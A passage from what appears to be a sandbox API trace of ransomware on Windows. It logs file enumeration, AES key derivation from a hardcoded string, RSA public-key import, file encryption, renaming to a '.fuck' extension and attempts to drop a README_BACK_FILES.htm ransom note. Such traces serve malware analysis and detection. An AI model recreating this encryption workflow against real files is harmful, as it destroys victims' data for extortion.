users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.609] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.609] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.610] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.612] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.612] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.612] CryptHashData (hHash=0x28bee98, pbData=0x2857330, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.612] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bee98, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28befd8) returned 1 [0239.612] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.612] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.612] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28adce0) returned 1 [0239.613] CryptImportPublicKeyInfo (in: hCryptProv=0x28adce0, dwCertEncodingType=0x1, pInfo=0x2898fe0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899010*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899018*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28beed8) returned 1 [0239.613] CryptEncrypt (in: hKey=0x28beed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.613] CryptEncrypt (in: hKey=0x28beed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad680*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ad680*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.613] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad680, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.613] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.613] CryptEncrypt (in: hKey=0x28befd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.614] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.614] CloseHandle (hObject=0xffffffff) returned 1 [0239.614] CloseHandle (hObject=0xffffffff) returned 1 [0239.614] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), bFailIfExists=0) returned 0 [0239.614] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x0) returned 0 [0239.615] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg")) returned 0 [0239.615] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.fuck")) returned 0 [0239.616] CryptDestroyHash (hHash=0x28bee98) returned 1 [0239.616] CryptDestroyKey (hKey=0x28befd8) returned 1 [0239.616] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.616] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.616] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.616] GetLastError () returned 0x5 [0239.616] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png")) returned 0x20 [0239.616] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x80) returned 0 [0239.617] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.617] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.618] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg", dwFileAttributes=0x2) returned 0 [0239.618] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.623] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.623] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.623] CryptHashData (hHash=0x28bef18, pbData=0x2856fc0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.623] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bef18, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bee58) returned 1 [0239.623] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.623] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.623] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28adb48) returned 1 [0239.624] CryptImportPublicKeyInfo (in: hCryptProv=0x28adb48, dwCertEncodingType=0x1, pInfo=0x2899250*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899280*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899288*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bec18) returned 1 [0239.624] CryptEncrypt (in: hKey=0x28bec18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.624] CryptEncrypt (in: hKey=0x28bec18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad790*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ad790*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.624] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad790, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.624] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.624] CryptEncrypt (in: hKey=0x28bee58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.624] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.624] CloseHandle (hObject=0xffffffff) returned 1 [0239.624] CloseHandle (hObject=0xffffffff) returned 1 [0239.624] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), bFailIfExists=0) returned 0 [0239.625] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x0) returned 0 [0239.625] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg")) returned 0 [0239.626] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.fuck")) returned 0 [0239.626] CryptDestroyHash (hHash=0x28bef18) returned 1 [0239.626] CryptDestroyKey (hKey=0x28bee58) returned 1 [0239.626] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.626] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.626] FindClose (in: hFindFile=0x28bec98 | out: hFindFile=0x28bec98) returned 1 [0239.627] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\readme_back_files.htm")) returned 0xffffffff [0239.627] AreFileApisANSI () returned 1 [0239.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0239.627] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.627] GetLastError () returned 0x5 [0239.627] GetLastError () returned 0x5 [0239.627] FindNextFileA (in: hFindFile=0x28bea98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.627] FindClose (in: hFindFile=0x28bea98 | out: hFindFile=0x28bea98) returned 1 [0239.628] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\readme_back_files.htm")) returned 0xffffffff [0239.628] AreFileApisANSI () returned 1 [0239.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0239.628] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.628] GetLastError () returned 0x5 [0239.628] GetLastError () returned 0x5 [0239.628] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.629] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bec98 [0239.629] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.629] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.629] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bee58 [0239.630] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.630] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.630] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bee98 [0239.630] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.631] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.631] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.631] GetLastError () returned 0x5 [0239.631] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml")) returned 0x20 [0239.631] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0239.632] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.632] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.632] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.633] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28ab150) returned 1 [0239.635] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.635] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.635] CryptHashData (hHash=0x28bf1d8, pbData=0x2857510, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.635] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf1d8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28bef18) returned 1 [0239.636] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.639] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.640] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28adc58) returned 1 [0239.641] CryptImportPublicKeyInfo (in: hCryptProv=0x28adc58, dwCertEncodingType=0x1, pInfo=0x28993f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899420*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899428*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28befd8) returned 1 [0239.641] CryptEncrypt (in: hKey=0x28befd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.641] CryptEncrypt (in: hKey=0x28befd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28adf88*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28adf88*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.641] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28adf88, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.641] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.641] CryptEncrypt (in: hKey=0x28bef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.641] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.641] CloseHandle (hObject=0xffffffff) returned 1 [0239.641] CloseHandle (hObject=0xffffffff) returned 1 [0239.642] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), bFailIfExists=0) returned 0 [0239.642] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x0) returned 0 [0239.643] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.gsg")) returned 0 [0239.643] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.fuck")) returned 0 [0239.644] CryptDestroyHash (hHash=0x28bf1d8) returned 1 [0239.644] CryptDestroyKey (hKey=0x28bef18) returned 1 [0239.644] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.644] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.644] FindClose (in: hFindFile=0x28bee98 | out: hFindFile=0x28bee98) returned 1 [0239.644] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\readme_back_files.htm")) returned 0xffffffff [0239.644] AreFileApisANSI () returned 1 [0239.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28ab150, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0239.644] CreateFileW (lpFileName="C:\\\\Users\\All 